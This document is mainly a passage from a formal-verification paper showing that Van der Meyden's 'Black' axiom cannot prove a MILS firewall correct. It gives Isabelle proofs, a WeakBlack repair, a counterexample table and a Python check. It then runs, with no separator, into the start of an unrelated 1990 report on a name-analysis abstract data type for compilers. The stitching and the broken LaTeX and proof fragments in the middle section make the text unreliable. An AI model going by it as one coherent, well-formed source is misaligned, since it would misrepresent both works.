The notion of \textit{being computed based only on a set of memory segments} is the same one that underlies the Separation axiom. In the Separation axiom, the requirement of the security policy is that the content of a memory segment in the next state is a function of its current content, the active partition, and the contents of the memory segments that are allowed to influence it. Using the same construction, Van der Meyden defines his sole axiom formalising \texttt{black} as follows:
\[
\begin{aligned}
\text{fun equals} & :: \mathbb{P} (\text{Segment}) \Rightarrow \text{State} \Rightarrow \text{State} \Rightarrow \mathbb{B} \\
\text{where} & \\
\text{equals} (X, s, t) & = \forall a \in X. \text{select} (s, a) = \text{select} (t, a)
\end{aligned}
\]
\textbf{assumes Black:} $\forall X \in \mathbb{P} (\text{Segment}), s \in \text{State}, a \in \text{Segment}$.
\[
(\forall r, t \in \text{State}. \ \text{equals} (X, r, t) \land \\
\text{current} (r) = \text{current} (t) \rightarrow \\
\text{select} (\text{next} (r), a) = \text{select} (\text{next} (t), a)) \land \\
(\forall b \in X. \ \text{black} (s, b)) \rightarrow \\
\text{black} (\text{next} (s), a)
\]
This axiom states that if the value of segment $a$ in the next state of $s$ is a function of the segments in $X$ and the active partition, then this function preserves blackness. In other words, as the value of $a$ is computed based on $X$, so is the blackness of $a$ inherited from $X$.
The \textbf{Black} axiom follows from the Rushby axioms; indeed, the proof for this in Isabelle is very simple. The proof starts by assuming the two premises stated in the \textbf{Black} axiom:
\[
\begin{aligned}
\text{fix} & \ X \ s \ a \\
\text{assume} & 1: \\
(\forall r, t \in \text{State}. \ \text{equals} (X, r, t) \land \\
\text{current} (r) = \text{current} (t) \rightarrow \\
\text{select} (\text{next} (r), a) = \text{select} (\text{next} (t), a)) \\
\text{assume} & (\forall b \in X. \ \text{black} (s, b))
\end{aligned}
\]
Because the segments in $X$ are already black in $s$ and are thus unaffected by \texttt{blacken} due to B2, and because \texttt{blacken} does not change the active partition of $s$ (B3), according to assumption 1 we have
\[
\text{select} (\text{next} (s), a) = \text{select} (\text{next} (\text{blacken} (s)), a).
\]
\textbf{hence select}(\text{next}(s), a) = \text{select}(\text{next}(\text{blacken}(s)), a) \\
\text{by (metis 1 B2 B3 equals_def)}
But of course \texttt{blacken}$(s)$ is black for all segments; by B5, so is \texttt{next} (\texttt{blacken}$(s)$). Because by B4 blackness is a function of the contents of a memory segment, we get
\[
\text{thus black}(\text{next}(s), a) \\
\text{by (metis B1 B4 B5)}
\]
which completes the proof.
Unfortunately, the \textbf{Black} axiom is not sufficient to show the FW\_Correct security requirement. This problem is the topic of the next section.
6. PRESERVATION OF BLACKNESS
In the paper introducing the \textbf{Black} axiomatisation of the \textbf{black} predicate [2], Van der Meyden appears to prove that together with the FW\_Pol, FW\_Blackens, and \textbf{Separation} axioms, the \textbf{Black} axiom is sufficient to prove the FW\_Correct theorem specifying the secure operation of the Firewall. Unfortunately, this proof is incorrect, and the \textbf{Black} axiom is in fact not strong enough to ensure that the \textbf{black} predicate is sufficiently well-behaved.
To prove FW\_Correct, Van der Meyden correctly shows that partitions other than $B$, including the Firewall partition $F$, can never make any segments of $B$ nonblack. He also shows that $B$ can never make any segments other than \texttt{outbox} nonblack without some other segment already being nonblack. A problem occurs, however, in proving that $B$ can never make \texttt{outbox} nonblack. For this to be the case due to the \textbf{Black} axiom, there needs to be a set of segments $X$ such that the next contents of \texttt{outbox} is a function of the active partition and the contents of the segments in $X$.
Van der Meyden shows that a set of segments $X$ exists such that among all states $s$ for which \texttt{current}$(s) = B$, the contents of \texttt{outbox} in \texttt{next}$(s)$ is a function of the contents of the segments in $X$. That is, he constructs a set $X$ such that for all segments $r$ and $t$ for which \texttt{current}$(r) = \texttt{current} (t) = B$, if \texttt{equals}$(X, r, t)$ holds, then we can conclude \texttt{select} (\texttt{next}$(r)$, \texttt{outbox}) = \texttt{select} (\texttt{next}$(t)$, \texttt{outbox}). Based on the “no spontaneous generation of nonblack data” intuition, we would expect this to be sufficient to show that \texttt{black} (\texttt{next}$(s)$, \texttt{outbox}) holds under the assumption that \texttt{current}$(s) = B$ and all segments in $X$ are black in $s$, and Van der Meyden argues exactly this in his proof of FW\_Correct. This does not follow from the \textbf{Black} axiom, however.
Indeed, there is nothing in the \textbf{Black} axiom that requires a computation step of $B$ to maintain the blackness of \texttt{outbox} when all segments accessible to $B$ are black. This would require the next contents of \texttt{outbox} to be a function of the active partition and \texttt{segs}(B). But in general, this is not the case; the Firewall partition generally writes to \texttt{outbox} based on segments not accessible to $B$, which means that the next content of \texttt{outbox} is not independent of those segments. Appendix A describes a specific counterexample in which this is the case, showing that the \textbf{Separation}, FW\_Pol, FW\_Blackens, and \textbf{Black} axioms can all be true while FW\_Correct is false.
To remedy this, we propose a stronger version of the \textbf{Black} axiom that does not suffer from this problem, and which we feel better formalises the intuition behind the \textbf{Black} axiom. In his flawed proof, Van der Meyden inadvertently argues that the next contents of \texttt{outbox} are a function of the active partition and the contents of a set $X$ of segments \textit{among those states $s$ for which \texttt{current}$(s) = B$}; because this predicate \texttt{current}$(s) = B$ is true for the specific state he is considering, he concludes that blackness follows for \texttt{outbox} in the next state of this specific state. We feel this line of reasoning should hold not just for \texttt{current}$(s) = B$ but for arbitrary predicates of $s$. That is, if the functional dependence of segment $a$ on the segments $X$ holds for all states matching some predicate $P$, and all segments of $X$ are black in a state $s$ also matching this predicate $P$, then $a$ should be black in the next state of $s$.
Formally:
\[
\begin{aligned}
\text{assumes StrongBlack:} \forall P \in \mathbb{P} (\text{State}), \\
X \in \mathbb{P} (\text{Segment}), s \in \text{State}, a \in \text{Segment}. \\
(\forall r, t \in \text{State}. \ P (r) \land P (t) \land \\
\text{equals} (X, r, t) \land \\
\text{current} (r) = \text{current} (t) \rightarrow \\
\text{select} (\text{next} (r), a) = \text{select} (\text{next} (t), a)) \land \\
(\forall b \in X. \ \text{black} (s, b)) \land \\
P (s) \rightarrow \\
\text{black} (\text{next} (s), a)
\end{aligned}
\]
This definition is a generalisation of \textbf{Black}; using $P (s) = \text{true}$ yields \textbf{Black} as a special case. Using this stronger axiom, the flawed step in Van der Meyden's proof can be repaired; in fact, the weaker special case WeakBlack discussed below already suffices.
The WeakBlack axiom is a special case of the StrongBlack axiom produced by substituting the predicate $P(t) \equiv current(s) = current(t)$ for the variable $P$; thus, it trivially follows from StrongBlack. More interestingly, it also follows from Rushby’s axioms, using almost exactly the same proof as the one in Section 5.3:
```isar
fix X s a
assume 1:
  (∀r, t ∈ State.
    current(s) = current(r) ∧
    equals(X, r, t) ∧
    current(r) = current(t) →
    select(next(r), a) = select(next(t), a))
assume (∀b ∈ X. black(s, b))
hence select(next(s), a) = select(next(blacken(s)), a)
  by (metis 1 B2 B3 equals_def)
thus black(next(s), a)
  by (metis B1 B4 B5)
```
When using the WeakBlack axiom instead of Black, Van der Meyden’s proof is correct. We prove this below by presenting Van der Meyden’s proof in fully formalised form in the Isabelle proof system.
The theorem we want to prove is that FW_Correct holds under the assumption of the Separation, FW_Blackens, FW_Pol, and WeakBlack axioms:
```
theorem
assumes Separation: ∀s, t ∈ State, a ∈ Segment.
equals(dia(a) ∩ segs(current(s)), s, t) ∧
current(s) = current(t) ∧
select(s, a) = select(t, a) →
select(next(s), a) = select(next(t), a)
assumes FW_Pol: ∀a, b ∈ Segment, P ∈ Partition.
a ∈ segs(B) ∧
b ∈ dia(a) ∧
b ∈ segs(P) ∧
P ≠ B →
(P = F ∧ a = outbox)
assumes FW_Blackens: ∀s ∈ State.
current(s) = F ∧ black(s, outbox) →
black(next(s), outbox)
assumes WeakBlack: ∀X ∈ P(Segment), s ∈ State, a ∈ Segment.
(∀r, t ∈ State. current(s) = current(r) ∧
equals(X, r, t) ∧
current(r) = current(t) →
select(next(r), a) = select(next(t), a)) ∧
(∀b ∈ X.black(s, b)) →
black(next(s), a)
```
Proof of this property is ultimately by induction on $n$. To simplify things, we first prove the correctness of the induction step as a lemma.
```
proof -
```
have 0: \( \forall s \in \text{State}, a \in \text{Segment}. \)
\( (\forall b \in \text{segs}(B). \ \text{black}(s, b)) \rightarrow \)
\( a \in \text{segs}(B) \rightarrow \text{black}(\text{next}(s), a) \)
proof -
fix \( s, a \)
assume 1: \( \forall b \in \text{segs}(B). \ \text{black}(s, b) \)
assume 2: \( a \in \text{segs}(B) \)
We now need to prove that \( \text{black}(\text{next}(s), a) \). This proof will proceed by cases, but first we prove the simple lemma that \( \text{FW}_{-}\text{Pol} \) applies to \( a \): in other words, that if something can influence \( a \), then \( a \) must be \( \text{outbox} \) and that something must be accessible only to \( B \) and \( F \). This is a triviality, but proving it here will spare us the effort of having to duplicate the proof in all the cases that make use of it.
with \( \text{FW}_{-}\text{Pol} \) have 3:
\( \forall b \in \text{Segment}, P \in \text{Partition}. \)
\( b \in \text{segs}(P) \rightarrow P \neq B \rightarrow b \in \text{dia}(a) \rightarrow (a = \text{outbox} \land P = F) \)
by simp
The proof of \( \blacken{(\text{next}(s), a)} \) will proceed by cases. We first consider the case where \( a \neq \text{outbox} \).
show \( \text{black}(\text{next}(s), a) \)
proof cases
assume 4: \( a \neq \text{outbox} \)
Because \( a \neq \text{outbox} \), by \( \text{FW}_{-}\text{Pol} \) and \( \text{Separation} \) it follows that the next contents of \( a \) are a function of the contents of \( \text{segs}(B) \) and the active partition. The \( \text{WeakBlack} \) axiom then lets us conclude the blackness of \( a \) in \( \text{next}(s) \) from the blackness of the segments in \( \text{segs}(B) \), which we assumed in assumption 1. To show this, we first need to establish the functional dependence of \( a \) on \( \text{segs}(B) \) and the active partition as a lemma to later feed to \( \text{WeakBlack} \).
have \( \forall r, t \in \text{State}. \)
\( \text{current}(s) = \text{current}(r) \rightarrow \)
\( \text{current}(r) = \text{current}(t) \rightarrow \)
\( \text{equals}(\text{segs}(B), r, t) \rightarrow \)
\( \text{select}(\text{next}(r), a) = \text{select}(\text{next}(t), a) \)
proof auto
fix \( r, t \)
assume 5: \( \text{current}(s) = \text{current}(r) \)
assume 6: \( \text{current}(r) = \text{current}(t) \)
assume 7: \( \text{equals}(\text{segs}(B), r, t) \)
Because \( a \in \text{segs}(B) \) and \( \text{equals}(\text{segs}(B), r, t) \), we have \( \text{select}(r, a) = \text{select}(t, a) \).
with 2 have 8: \( \text{select}(r, a) = \text{select}(t, a) \)
unfolding \text{equals}_{-}\text{def} \) by simp
Because of \( \text{FW}_{-}\text{Pol} \) and the fact that \( a \neq \text{outbox} \), we must have \( \text{dia}(a) \subseteq \text{segs}(B) \). Because \( \text{equals}(\text{segs}(B), r, t) \) and \( (X \cap Y) \subseteq X \), we certainly have the following:
from 3 4 7 have \( \text{equals}(\text{dia}(a) \cap \text{segs}(\text{current}(r)), r, t) \)
unfolding \text{equals}_{-}\text{def} \) by auto
But then \( \text{Separation} \) gives us the desired result:
with 6 8 \( \text{Separation} \) show \( \text{select}(\text{next}(r), a) = \text{select}(\text{next}(t), a) \)
by simp
qed
This finishes the lemma stating that the next contents of \( a \) are a function of the contents of \( \text{segs}(B) \) and the active partition. The \( \text{WeakBlack} \) axiom will now prove the blackness of \( a \) in \( \text{next}(s) \).
with 1 \( \text{WeakBlack} \) show \( \text{black}(\text{next}(s), a) \) by auto
This finishes the case where \( a \neq \text{outbox} \).
Next, we make a further case distinction on the value of the active partition in \( s \). We consider three cases: \( \text{current}(s) = B, \text{current}(s) = F, \) and \( \text{current}(s) \neq B \land \text{current}(s) \neq F. \)
next assume 4: \( a = \text{outbox} \)
show \( ?\text{thesis} \)
proof cases
assume 5: \( \text{current}(s) = B \)
The case where \( \text{current}(s) = B \) uses the same structure as the \( a \neq \text{outbox} \) case. It first proves the lemma that the next contents of \( a \) are a function of the contents of \( \text{segs}(B) \) and the active partition.
have \( \forall r, t \in \text{State}. \)
\( \text{current}(s) = \text{current}(r) \rightarrow \)
\( \text{current}(r) = \text{current}(t) \rightarrow \)
\( \text{equals}(\text{segs}(B), r, t) \rightarrow \)
\( \text{select}(\text{next}(r), a) = \text{select}(\text{next}(t), a) \)
proof auto
fix \( r, t \)
assume 6: \( \text{current}(s) = \text{current}(r) \)
assume 7: \( \text{current}(r) = \text{current}(t) \)
assume 8: \( \text{equals}(\text{segs}(B), r, t) \)
with 2 have 9: \( \text{select}(r, a) = \text{select}(t, a) \)
unfolding \text{equals}_{-}\text{def} \) by simp
The details of this step are different from the \( a \neq \text{outbox} \) case, however. Here, the next contents of \( a \) are only a function of the contents of \( \text{segs}(B) \) and the active partition for those states \( s \) with \( \text{current}(s) = B \); in other words, this is the point in the proof in which the difference between \( \text{WeakBlack} \) and \( \text{Black} \) is crucial, and it’s the point where Van der Meyden’s original proof is incorrect. Because \( \text{current}(r) = \text{current}(t) \), we have \( \text{equals}(\text{dia}(a) \cap \text{segs}(\text{current}(r)), r, t) \):
from 5 6 7 8 have
\( \text{equals}(\text{dia}(a) \cap \text{segs}(\text{current}(r)), r, t) \)
unfolding \text{equals}_{-}\text{def} \) by simp
The remainder of this case proceeds in the same way as the case where \( a \neq \text{outbox} \).
with 7 9 \( \text{Separation} \) show \( \text{select}(\text{next}(r), a) = \text{select}(\text{next}(t), a) \)
by simp
qed
with 1 \( \text{WeakBlack} \) show \( \text{black}(\text{next}(s), a) \) by auto
This concludes the case where \( \text{current}(s) = B \).
The case where \( \text{current}(s) = F \) is almost trivial; blackness of \( a \) in \( \text{next}(s) \) follows immediately from its blackness in \( s \) and \( \text{FW}_{-}\text{Blackens} \):
next assume 5: \( \text{current}(s) \neq B \)
show \( ?\text{thesis} \)
proof cases
assume 6: \( \text{current}(s) = F \)
from 1 2 4 have \( \text{black}(s, \text{outbox}) \) by simp
with 4 6 \( \text{FW}_{-}\text{Blackens} \) show \( ?\text{thesis} \) by simp
All that remains is the case where both $\text{current}(s) \neq B$ and $\text{current}(s) \neq F$ hold. This, too, is a simple case: the security policy forbids the active partition from modifying any of the segments of $B$, which means the same proof used for the $a \neq \text{outbox}$ case applies.
\text{next assume 6: } \text{current}(s) \neq F \\
\text{have } \forall r, t \in \text{State}. \\
\text{current}(s) = \text{current}(r) \rightarrow \\
\text{current}(r) = \text{current}(t) \rightarrow \\
\text{equals}(\text{segs}(B), r, t) \rightarrow \\
\text{select}(\text{next}(r), a) = \text{select}(\text{next}(t), a) \\
\text{proof auto} \\
\text{fix } r, t \\
\text{assume 8: } \text{current}(s) = \text{current}(r) \\
\text{assume 9: } \text{current}(r) = \text{current}(t) \\
\text{assume equals}(\text{segs}(B), r, t) \\
\text{with 2 have 10: } \text{select}(r, a) = \text{select}(t, a) \\
\text{unfolding equals_def by simp} \\
\text{with 3 5 6 8 9 have} \\
\text{equals}(\text{dia}(a) \cap \text{segs}(\text{current}(r)), r, t) \\
\text{unfolding equals_def by auto} \\
\text{with 9 10 Separation show} \\
\text{select}(\text{next}(r), a) = \text{select}(\text{next}(t), a) \\
\text{by simp} \\
\text{qed} \\
\text{with 1 WeakBlack show black(\text{next}(s), a) by auto} \\
\text{qed qed qed qed}
Because this is the last case, this finishes the proof of the lemma which states the correctness of the induction step of the main theorem. That is, we just proved $\forall s, a, (\forall b \in \text{segs}(B). \text{black}(s, b)) \rightarrow a \in \text{segs}(B) \rightarrow \text{black}(\text{next}(s), a)$.
With this lemma in hand, we can now easily prove the main theorem, with an appeal to the lemma 0 in the induction step:
$$
\forall s \in \text{State}, n \in \mathbb{N}.
(\forall a \in \text{segs}(B). \text{black}(s, a)) \rightarrow \\
(\forall a \in \text{segs}(B). \text{black}(\text{run}(n, s), a))
$$
\text{proof -} \\
\text{fix } s, n \\
\text{assume } \forall a \in \text{segs}(B). \text{black}(s, a) \\
\text{then show } \forall a \in \text{segs}(B). \text{black}(\text{run}(n, s), a) \\
\text{proof (induction } n, \text{ auto)} \\
\text{fix } n, x \\
\text{assume 2: } \forall x \in \text{segs}(B). \text{black}(\text{run}(n, s), x) \\
\text{assume 3: } x \in \text{segs}(B) \\
\text{with 0 2 show black(\text{next}(\text{run}(n, s)), x) by simp} \\
\text{qed qed qed qed}
This completes the proof.
8. CONCLUSION
In the previous section, we have proven the formal property $\text{Separation} \land \text{FW\_Pol} \land \text{FW\_Blackens} \land \text{WeakBlack} \rightarrow \text{FW\_Correct}$. That is, we have shown that the desired security property that the untrusted application does not gain access to sensitive information holds, under the assumption that the separation kernel and Firewall application behave in a certain way.
The point of this exercise is to study techniques for the formal verification of system properties in a compositional way. In this paper we did not prove any properties about the behaviour of system components such as the separation kernel or the Firewall; instead, these properties were taken for granted. The problem studied in this paper is how to make use of independently proven properties describing individual system components to prove properties of the system as a whole in which these components play a role; that is, to compose verified behaviour of components into verified behaviour of the complete system.
When verifying practical systems, one would presumably independently prove behavioural properties regarding individual system components, and then later attempt the composition in a way similar to the methods used in this paper. Based on our experience formalising the notions presented in this paper, we feel confident that compositional formal validation of system properties is a practical technique for certifying desired system properties in applications such as security certification.
Acknowledgments
We acknowledge funding from the European Union’s Seventh Framework Programme (FP7/2007-2013) under grant agreement n° 318353 (EURO-MILS project: http://www.euromils.eu).
9. REFERENCES
APPENDIX
A. COUNTEREXAMPLE TO VAN DER MEYDEN’S AXIOM
In Section 6, we described how a system can be constructed that satisfies the Separation, FW_Pol, FW_Blackens, and Black axioms, while still not satisfying FW_Correct. For the sake of completeness, we provide here a specific minimal system for which this is the case.
Consider a GWV system as described in Section 3 consisting of two segments outbox and inbox, a partition B with \( \text{segs}(B) = \{\text{outbox}\} \), and a second partition F with \( \text{segs}(F) = \{\text{outbox, inbox}\} \). The dia function does not constrain any types of influence: \( \text{dia}(a) = \{\text{outbox, inbox}\} \) for both values of a. The system has three possible states, named \( S_1 \), \( S_2 \), and \( S_3 \). The three states succeed each other in a cycle: \( \text{next}(S_1) = S_2 \), \( \text{next}(S_2) = S_3 \), and \( \text{next}(S_3) = S_1 \).
The contents of the memory, its sensitivity, and the active partition are summarized in Table 1. The \( F \) partition is active in the states \( S_1 \) and \( S_2 \), and \( B \) is active in \( S_3 \). The contents of outbox are equal for states \( S_1 \) and \( S_2 \), and different for \( S_3 \); the contents of inbox are equal for \( S_1 \) and \( S_3 \) and different for \( S_2 \). Of course, the exact values are irrelevant.
The outbox segment is black in states \( S_2 \) and \( S_3 \); the inbox segment is never black. This has the curious property that the states \( S_1 \) and \( S_2 \) have the same contents for the outbox segment, but differing blackness for that segment: the GWV and Rushby axiomatisations of the black predicate would not allow this, but it is possible under the Black axiom.
The system described here satisfies the Separation axiom. Because the dia function describes the complete relation and thus does not forbid anything, and because \( B \) does not write to inbox in the one state in which it is active, this is trivial.
Because \( B \) and \( F \) are the only partitions in the system and outbox is the only segment in segs(B), FW_Pol is trivially satisfied. The FW_Blackens axiom is easily checked by verifying that black(next(s),outbox) is true for every state s with current(s) = \( F \).
Showing that this system satisfies Black is less obvious. The value of outbox in the next state of s is not a function of the current value of outbox and the active partition; indeed, the states \( S_1 \) and \( S_2 \) have the same active partition and the same values for outbox, yet select(next(S_1),outbox) = 1 \( \neq \) 2 = select(next(S_2),outbox). The value of outbox in the next state of s is a function of the current value of inbox and the active partition, and therefore also of the superset {outbox, inbox}. However, all we can conclude from this using the Black axiom is that if all segments in {inbox} are black, then outbox must be black in the next state. Because inbox is never black, this is vacuously true. Thus, the system satisfies Black in a vacuous way.
The WeakBlack axiom, and therefore also the StrongBlack axiom, would note that among all states for which current(s) = \( B \), the contents of outbox in the next state is a function of the active partition and the contents of outbox; indeed, it is even a function of the active partition and the contents of \( \emptyset \). Thus, they would require that whenever outbox is black in a state for which \( B \) is the active partition, then outbox must still be black in the next state. This system, then, does not satisfy the WeakBlack axiom, and is not a counterexample against it.
For the Black axiom, however, it is indeed a counterexample. This system does not satisfy FW_Correct: in state \( S_3 \) all segments of \( B \) are black, yet in the next state \( S_1 \), this is no longer the case. That makes this a system for which the Separation, FW_Pol, FW_Blackens, and Black axioms are satisfied, yet FW_Correct does not hold, and hence a demonstration that Van der Meyden’s proof is flawed.
<table>
<thead>
<tr>
<th>s</th>
<th>next(s)</th>
<th>current(s)</th>
<th>select(s,outbox)</th>
<th>select(s, inbox)</th>
<th>black(s,outbox)</th>
<th>black(s,inbox)</th>
</tr>
</thead>
<tbody>
<tr>
<td>\( S_1 \)</td>
<td>\( S_2 \)</td>
<td>\( F \)</td>
<td>1</td>
<td>3</td>
<td>false</td>
<td>false</td>
</tr>
<tr>
<td>\( S_2 \)</td>
<td>\( S_3 \)</td>
<td>\( F \)</td>
<td>1</td>
<td>4</td>
<td>true</td>
<td>false</td>
</tr>
<tr>
<td>\( S_3 \)</td>
<td>\( S_1 \)</td>
<td>\( B \)</td>
<td>2</td>
<td>3</td>
<td>true</td>
<td>false</td>
</tr>
</tbody>
</table>
Table 1: The Firewall MILS Example.
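The claims above can be checked mechanically. The following sketch transcribes Table 1 into Python and tests the two key properties; all names here (next_state, current, black, and the two predicate functions) are our own, not part of the paper's formal model.

```python
# Transcription of Table 1; names are our own illustration.
next_state = {"S1": "S2", "S2": "S3", "S3": "S1"}
current = {"S1": "F", "S2": "F", "S3": "B"}
black = {"S1": {"outbox": False, "inbox": False},
         "S2": {"outbox": True,  "inbox": False},
         "S3": {"outbox": True,  "inbox": False}}

def fw_blackens_holds():
    # FW_Blackens: whenever F is active, outbox is black in the next state.
    return all(black[next_state[s]]["outbox"]
               for s in next_state if current[s] == "F")

def fw_correct_holds():
    # FW_Correct (informally): once every segment of B -- here just outbox --
    # is black, it must remain black in the next state.
    return all(black[next_state[s]]["outbox"]
               for s in next_state if black[s]["outbox"])

print(fw_blackens_holds())  # True
print(fw_correct_holds())   # False: the step from S_3 to S_1 loses blackness
```

The second check fails precisely on the transition from \( S_3 \) (where \( B \) is active and outbox is black) to \( S_1 \), which is the counterexample discussed above.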
An Abstract Data Type for Name Analysis
U. Kastens
W. M. Waite
CU-CS-460-90
ANY OPINIONS, FINDINGS, AND CONCLUSIONS OR RECOMMENDATIONS EXPRESSED IN THIS PUBLICATION ARE THOSE OF THE AUTHOR(S) AND DO NOT NECESSARILY REFLECT THE VIEWS OF THE AGENCIES NAMED IN THE ACKNOWLEDGMENTS SECTION.
CU-CS-460-90 March, 1990
ABSTRACT: This paper defines an abstract data type on which a solution to the name analysis subproblem of a compiler can be based. We give a state model for the ADT, and show how that model can be implemented efficiently. The implementation is independent of any particular name analysis, so it is possible to create a library module that can be used in any compiler. Such a library module has been incorporated into the Eli compiler construction system.
1. Introduction
The problem of compiling a program can be decomposed into a number of sub-problems, many of which have standard solutions. If a subproblem has a standard solution, there is no need for a compiler designer to re-invent that solution. The standard solution can be packaged in a module and re-used. Development of a library of such modules should be accorded high priority by researchers studying the compiler construction process.
In this paper we consider the name analysis subproblem. This is the problem of determining which source language entity is denoted by each identifier occurrence in a program. For example, in the Pascal program of Figure 1 the programmer has used the identifier $A$ to denote a variable on line 10. On line 12, $A$ denotes a field of the record pointed to by $P$. The identifier $B$, on the other hand, has been used to denote a field of the record $R$ (declared on line 6) on both lines. A Pascal compiler’s name analysis task must determine which entity is denoted by each occurrence of $A$, which by each occurrence of $B$, and so forth.
Source language entities are described by sets of properties. The Pascal entity declared on line 6 of Figure 1 is a variable capable of holding values of a particular type. Its lifetime is the entire execution history of the program, and it will occupy a certain amount of storage at a particular address during execution. Thus this entity might be described by the following property values:
```pascal
1 program Context (input, output);
2 const C = 1.2;
3 type T = record A, B, C: integer end;
4 var
5 A: real;
6 R: T;
7 P: ^T;
8 begin
9 new (P); readln (R.B, R.C, P^.C);
10 A := R.B + C;
11 with P^ do (* Re-defines A B C *)
12 A := R.B + C;
13 R := P^; writeln (A, R.A);
14 end.
```
Figure 1
A Pascal Program
Class: Variable
Type: real (determines the storage requirement also)
Level: 1 (indicates the variable is global)
Offset: -12 (address relative to the global storage area base)
All entities would have a Class property in their description, but the remaining properties might be different for entities of different classes.
Each entity can be characterized by a key, which allows the compiler to access the entity's properties. Because the key characterizes the source program entity, the name analyzer need only determine a key for each identifier occurrence. Property access may be implemented by an appropriate data base technique or a definition table with one entry for each key, but these decisions are totally independent of name analysis.
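For illustration, such a definition table can be sketched as an opaque-handle store. The following Python fragment is our own; the paper deliberately leaves the representation of keys and properties open.

```python
# A minimal definition-table sketch: a DefTableKey is an opaque integer
# handle, and each key owns a dictionary of named properties.
NoKey = 0
_table = {NoKey: {}}          # key -> property dictionary; NoKey has none

def new_key():
    k = max(_table) + 1
    _table[k] = {}
    return k

def set_prop(key, name, value):
    _table[key][name] = value

def get_prop(key, name, default=None):
    return _table[key].get(name, default)

r = new_key()                 # e.g. the entity R declared on line 6 of Figure 1
set_prop(r, "Class", "Variable")
set_prop(r, "Level", 1)
print(get_prop(r, "Class"))   # Variable
```

The point of the indirection is exactly the one made above: the name analyzer only traffics in keys, while property storage can be swapped out without touching name analysis.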
Name analysis is based on the scope rules of the source language being compiled. Scope rules are formulated in terms of definitions, which cause identifiers to denote source language entities, and program regions: For each definition, the scope rules specify the program region in which that definition is valid. In Figure 1, the variable declaration on line 6 is a definition that causes the identifier R to denote a particular Pascal entity. The scope rules of Pascal state that this definition is valid for the region consisting of lines 2 through 14.
A definition is represented in the compiler by a binding between an identifier and a key. The particular set of (identifier,key) bindings valid at a program point is called the environment of that program point. At the occurrence of A in line 10 of Figure 1, the scope rules of Pascal specify that bindings exist for C, T, A, R, P, and all of the predefined identifiers of Pascal. At the occurrence of B on the same line, however, only bindings for A, B and C are valid. Moreover, the binding for A valid at the occurrence of A is different from the binding for A valid at the occurrence of B.
The concept of an environment can be captured in an abstract data type (ADT). This ADT provides operations for creating environments, populating them with (identifier,key) bindings, and carrying out mappings from identifiers to keys based upon them. If a module that efficiently implements the environment ADT is available, a compiler's name analysis task can be carried out by appropriate invocations of that module's operations. The module itself is independent of the source language; different scope rules affect only the way in which the module is invoked.
We describe the structure and operations of the environment ADT algebraically in Section 2. Section 3 presents a state model of the ADT, and Section 4 shows how that model can be efficiently implemented by a standard module. In Section 5 we show how the standard environment module can be used to carry out name analysis for several important kinds of scope rules, demonstrating that it supports a wide range of compilers.
2. The Environment Abstract Data Type
The computations used during name analysis can be specified algebraically in terms of three abstract data types:
- **Identifier** — The compiler’s internal representation of an identifier
- **DefTableKey** — The compiler’s internal representation of a key
- **Environment** — The compiler’s internal representation of a scope
Each textually-distinct identifier is represented by a unique value of type Identifier. (The meaning of “textually-distinct” depends, of course, on the source language. A compiler for Pascal would represent both Xy and xy by the same Identifier value, but a C compiler would use different Identifier values for these identifiers.) Values of type DefTableKey provide access to the properties of an object. There is a distinguished DefTableKey value, NoKey, that provides access to no properties. We shall not explore the details of the Identifier and DefTableKey ADTs in this paper.
There are as many interesting Environment values as there are distinct scopes in a program. (“Scope” was introduced in the ALGOL 60 Report as the name for the region of a program in which the declaration of an identifier denoting a particular entity is valid.) In most programs, several definitions are valid over identical regions of the program and thus the number of distinct scopes is smaller than the number of distinct (identifier, key) bindings. For example, in Figure 1 the scopes of the field identifiers A, B, and C are identical. The constant, type and variable identifiers in Figure 1 also have identical scopes, and these scopes are distinct from those of the field identifiers. A third set of identical scopes, those for the pseudo-variables implicitly defined by the **with** statement, exists in Figure 1. Finally, the Pascal Standard defines a scope external to the program for the required identifiers (e.g., integer, real). Thus four Environment values would be used by a Pascal compiler when compiling Figure 1 because there are four distinct scopes in that program.
Although Figure 1 has only four distinct scopes, there are five distinct environments for program points. Let us consider two of these:
1) The environment for the occurrences of B in lines 10 and 12, and the second occurrence of A in line 13, contains only bindings for A, B and C. Each identifier is bound to a key characterizing a field of the record type declared on line 3.
2) The environment for the program points between the keywords **record** and **end** in line 3 contains the bindings of environment (1), plus bindings for T, R, P and all of the predefined identifiers of Pascal.
The difference between these two environments is that (2) has inherited a number of bindings valid in the region outside the record declaration. That inheritance is the result of the following scope rule, first stated for ALGOL 60 and since used for almost all hierarchically-structured programming languages with static binding:
A definition is valid in its own scope and in all nested scopes not containing a definition for the same identifier.
As a consequence, a definition in a scope hides definitions for the same identifier in enclosing scopes, which is why environment (2) did not inherit the binding between the identifier $A$ and the key for the real variable declared on line 5.
Environments (1) and (2) are represented by the same $Environment$ value. The distinction is embodied in the environment abstract data type by preserving the hierarchical relationships among the $Environment$ values and providing two access operations. One of these access operations yields only the bindings in the scope corresponding to a specified $Environment$ value. That access function would be used to implement environment (1). The other access function, used to implement environment (2), yields the bindings in the scope corresponding to a specified $Environment$ value and any bindings from enclosing scopes (provided those bindings are not hidden).
Figure 2 $^4$ describes the behavior of the environment abstract data type in terms of $Identifier$ and $DefTableKey$. The scope hierarchy is conveyed to the ADT through use of $NewScope$, whose operand is the $Environment$ value for the scope enclosing the one being created. $KeyInScope$ makes available only the bindings whose scope is specified by its first operand, while $KeyInEnv$ makes available the bindings in that scope and all enclosing scopes. Note that the hiding is accomplished by searching the nest of scopes hierarchically, from smallest to largest, and returning the first binding found.
Both $KeyInScope$ and $KeyInEnv$ are total functions returning a single value of type $DefTableKey$. Some languages, for example Algol 68$^5$ and Ada,$^6$ allow an environment
---
**Signatures**
$NewEnv : \rightarrow Environment$
$NewScope : Environment \rightarrow Environment$
$Add : Environment \times Identifier \times DefTableKey \rightarrow Environment$
$KeyInScope : Environment \times Identifier \rightarrow DefTableKey$
$KeyInEnv : Environment \times Identifier \rightarrow DefTableKey$
---
**Axioms**
(A1) $KeyInScope\ (NewEnv\ (), i) = NoKey$
(A2) $KeyInScope\ (NewScope\ (e), i) = NoKey$
(A3) $KeyInScope\ (Add\ (e, i_1, k), i_2) = \text{if } i_1 = i_2 \text{ then } k \text{ else } KeyInScope\ (e, i_2)$
(A4) $KeyInEnv\ (NewEnv\ (), i) = NoKey$
(A5) $KeyInEnv\ (NewScope\ (e), i) = KeyInEnv\ (e, i)$
(A6) $KeyInEnv\ (Add\ (e, i_1, k), i_2) = \text{if } i_1 = i_2 \text{ then } k \text{ else } KeyInEnv\ (e, i_2)$
---
**Figure 2**
Algebraic Specification of an Environment ADT
